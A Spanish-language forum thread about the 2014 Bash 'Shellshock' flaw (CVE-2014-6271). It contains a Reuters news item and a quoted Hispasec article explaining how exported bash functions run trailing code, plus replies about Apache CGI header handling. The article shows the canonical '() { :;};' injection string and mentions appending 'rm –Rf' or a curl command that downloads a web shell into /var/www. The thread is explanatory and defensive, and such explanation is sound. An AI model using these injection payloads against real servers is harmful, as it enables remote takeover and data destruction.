'Bash', un nuevo fallo de seguridad que podría ser más dañino que 'Heartbleed'

Iniciado por wolfbcn, 25 Septiembre 2014, 13:36 PM

0 Miembros y 1 Visitante están viendo este tema.

wolfbcn

BOSTON, 25 sep (Reuters) - Un fallo de seguridad recientemente descubierto en un software de Linux muy utilizado, conocido como "Bash", podría representar una mayor amenaza a los usuarios de ordenadores que el error "Heartbleed" que surgió en abril, advirtieron el miércoles expertos en ciberseguridad.

Bash es el software que se usa para controlar la línea de comandos en muchos ordenadores que funcionan con Linux. Los piratas informáticos podrían explotar un fallo en Bash para tomar el control completo de un sistema atacado, dijeron expertos en seguridad.

El error "Heartbleed" permitió a los piratas informáticos espiar ordenadores, pero no tomar el control de ellos, según Dan Guido, consejero delegado de la firma de seguridad Trails of Bits. "El método de explotar este tema también es mucho más simple. Basta con copiar y pegar una línea de código y obtener buenos resultados", sostuvo. Guido dijo que está considerando sacar de línea a los servidores no esenciales de su compañía para protegerlos de ataques mediante el error Bash hasta que puedan aplicar un parche al software que corrija el fallo.

Tod Beardsley, administrador de ingeniería en la firma de ciberseguridad Rapid7, advirtió de que el error tenía una nota de gravedad "10", lo que significa que tiene un impacto máximo, y una calificación "baja" en complejidad de explotación, lo que significa que es relativamente fácil de utilizar por piratas informáticos para lanzar ataques. "Al usar esta vulnerabilidad, los atacantes potencialmente pueden tomar el control del sistema operativo, acceder a información confidencial, hacer cambios, etc", dijo Beardsley. "Cualquiera con sistemas que ocupen Bash deben aplicar el parche inmediatamente", agregó.

"Heartbleed", descubierto en abril, es un error en un software cifrado de código abierto llamado OpenSSL. El fallo puso en riesgo los datos de millones de personas, debido a que OpenSSL es utilizado en casi dos tercios de todos los sitios de internet. También obligó a una decena de compañías tecnológicas a lanzar parches de seguridad para cientos de productos que usan OpenSSL.

http://www.lavanguardia.com/tecnologia/internet/20140925/54416313139/bash-un-nuevo-fallo-de-seguridad-que-podria-ser-mas-danino-que-heartbleed.html

Más información

Bash. Significa golpe, porrazo o castaña : http://unaaldia.hispasec.com/2014/09/bash-significa-golpe-porrazo-o-castana.html
La mayoria pedimos consejo cuando sabemos la respuesta, pero queremos que nos den otra.

daryo

http://unaaldia.hispasec.com/2014/09/bash-significa-golpe-porrazo-o-castana.html
Citar Bash. Significa golpe, porrazo o castaña.
Sin lugar a dudas, una de las vulnerabilidades del año, con el permiso de lo que quede por llegar, va a ser esta que vamos a comentar. Su matrícula es CVE-2014-6271, un número que va a rebotar en la cabeza de los administradores durante bastantes meses.

Resulta que bash, el intérprete de comandos más extendido en el mundo UNIX y derivados, tiene una curiosa y oscura funcionalidad que puede ser abusada hasta el punto de retorcerla y usarla para ejecutar código arbitrario en sistemas remotos.

Cuando lees una noticia así en una lista de seguridad te viene a la cabeza la imagen de Gandalf el Gris, detrás de ti, dándote golpecitos en la cabeza con su bastón mientras te grita "Parchea!!! Insensatooooooo". No es para menos...

Veamos primero la funcionalidad, presente desde hace años en la misma página de manual de bash:

Citar"Functions may be exported so that subshells automatically have them defined with the -f option to the export builtin. A function definition may be deleted using the -f option to the unset builtin"


Esto es un mecanismo similar a cuando exportamos variables definidas en un entorno hacia otro proceso.

Vamos a probar la funcionalidad de manera básica:

Primero creamos una función en el intérprete

Código (bash) [Seleccionar]
$function test { echo "hola";}


Ahora le decimos a bash que la exporte:

Código (bash) [Seleccionar]
$ export –f test


Creamos un nuevo interprete...

Código (bash) [Seleccionar]
$ bash


...y llamamos a la función que acabamos de exportar:

Código (bash) [Seleccionar]
$ test
hola


¿Dónde está el problema?

En el mecanismo que hace de exportación de esa función, la forma en la que lo hace y como interpreta el código que se inyecta en el entorno donde es exportada.

Para conseguir esa exportación de funciones bash recurre a un pequeño "truco". No exporta la función en sí, sino en una variable de entorno donde se interpreta su valor como el cuerpo de una función. Vamos a verlo modificando el ejemplo anterior, en vez de una función vamos a crear una variable de entorno:

Código (bash) [Seleccionar]
$ test='() {echo "hola";}'


Exportamos, no una función sino una variable que es lo que haría el intérprete:

Código (bash) [Seleccionar]
$ export test


Ahora creamos un intérprete y volvemos a invocar nuestra función 'test':

Código (bash) [Seleccionar]
$ bash
$ test
hola



Curioso, ¿verdad?.

Bueno, pues cuando el entorno recibe esta variable y el interprete detecta la siguiente cadena '() {' entiende que está ante una función y comienza a interpretar su código. El problema y aquí entramos en la zona peligrosa, es que no para de interpretar cuando termina el cuerpo de la función y continua ejecutando el código que viene detrás del cuerpo.

Por ejemplo, si el intérprete tiene la siguiente variable-función exportada con código más allá de la definición de la función:
Código (bash) [Seleccionar]

'(){ echo "hola"; }; /bin/ls'



Terminará ejecutando el '/bin/ls' cuando se esté interpretando esa cadena. No hará falta invocar la función, justo cuando el interprete procese las cadenas detrás del cuerpo de la función ejecutará el comando. Idealmente, debería de terminar justo cuando encuentre el '};' correspondiente pero inexplicablemente no lo hace y peor aun ejecuta directamente ese código anexado al cuerpo de la función.

¿Por qué es peligroso?

Son muchísimos los vectores. Las variables de entorno y los intérpretes de comandos son exportados y creados en infinidad de situaciones. El peligro real, es cuando un proceso remoto acepta cadenas de entrada y hace uso de ellas a través de variables de entorno. Ahí es donde se puede inyectar una variable que contenga la cadena '(){' seguida de código arbitrario, comandos que terminarán siendo ejecutados por el proceso.

El ejemplo, ya canónico y que posiblemente veamos estampado en alguna camiseta, es la mínima expresión de definición de una función en bash "() { :;};"

Es fácil interpretarlo, el bloque de la función definida contiene el carácter ':' que en bash no hace nada, simplemente devolver cero. Su correspondiente en C sería un "return 0;". A esa cadena por supuesto se le puede adosar cualquier comando, desde un 'echo "yo estuve aquí" hasta un devastador "rm –Rf" o un "curl****/mi_shell.php" para depositarla en "/var/www/".

En la lista oss-security, donde se dio a conocer públicamente el problema, exponen un escenario que caracteriza el empleo de este ataque. Supongamos un script CGI que procesa las cabeceras HTTP mapeando su clave, valor a variables de entorno. No cuesta imaginar que sucede a partir de aquí. En el momento que se reciba una petición HTTP con una cabecera "cocinada" sería posible que dicho sistema termine ejecutando los comandos que se inyecten desde el exterior.

¿Quién la ha descubierto?

Su nombre es Stephane Chazelas. Francés apasionado del mundo UNIX, Chazelas no es un nombre muy conocido, hasta ahora, en la comunidad de seguridad. No se saben los detalles de cómo llegó hasta la vulnerabilidad, pero es bastante posible que gracias a sus profundos conocimientos de cómo funcionan las entrañas del sistema le proporcionará la óptica necesaria para ver aquello que otros no vieron.

Chazelas apostó por informar sobre su hallazgo a las vías adecuadas para que el problema fuese corregido antes de ser anunciado,  aunque casi al final se filtró por algún medio y se precipitó la publicación de detalles y parches.

Una reflexión

Si hacemos un repaso de las últimas vulnerabilidades podríamos ver desde cierta perspectiva que un buen grupo de ellas ya no se asientan sobre desbordamientos de memoria u otras, llamémoslas vulnerabilidades clásicas. Este tipo de errores tira más al fondo, a la lógica del diseño, un territorio donde los fuzzers comienzan a dejar de ser eficaces (no dejarán de serlo completamente) y se confía más en una comprensión del problema que solo te puede proporcionar la experiencia y la capacidad de conectar los vértices que componen la figura final.

Este tipo de errores siempre han existido y el otro tipo, los provocados por funcionalidades achacables a ciertos lenguajes (sí, C y C++, vosotros dos) no van a dejar de dar quebraderos de cabeza. Pero los problemas que derivan de un diseño inadecuado... ¿Qué IDS está preparado para ello? Quizás pueda parar una cadena pasada por Shikata Ga Nai ochocientas veces pero ¿Cómo paras una cabecera HTTP que contiene una definición de una función que va a ser exportada y de paso ejecutado el código que viene detrás? ¿Y la funcionalidad heartbeat de OpenSSL? No hay un detector de diseños defectuosos, no lo habrá nunca. Jamás.

Más información

remote code execution through bash
http://www.openwall.com/lists/oss-security/2014/09/24/11

Bash specially-crafted environment variables code injection attack
https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/
buenas

Kase

CitarSupongamos un script CGI que procesa las cabeceras HTTP mapeando su clave a variables de entorno

que probabilidad hay de tener un script asi?


o de tener algun otro script parecido?


MinusFour

Cita de: Kase en 26 Septiembre 2014, 19:59 PM
que probabilidad hay de tener un script asi?


o de tener algun otro script parecido?



Realmente no es del script en sí, si no de la forma en algunos servidores HTTP exportan variables al sistema, como apache.

http://httpd.apache.org/docs/2.2/env.html

Citar
Although these variables are referred to as environment variables, they are not the same as the environment variables controlled by the underlying operating system. Instead, these variables are stored and manipulated in an internal Apache structure. They only become actual operating system environment variables when they are provided to CGI scripts and Server Side Include scripts. If you wish to manipulate the operating system environment under which the server itself runs, you must use the standard environment manipulation mechanisms provided by your operating system shell.

Claro que hay muchas cosas que pasan por un script que va por CGI que también pueden ser vectores de ataque.

Si el servicio lo levantaron de /bin/sh, entonces las cabeceras se exportan como deben (porque estás manejando sh y no bash). Claro que se puso de moda poner /bin/sh como link a /bin/bash y de ahí muchos problemas.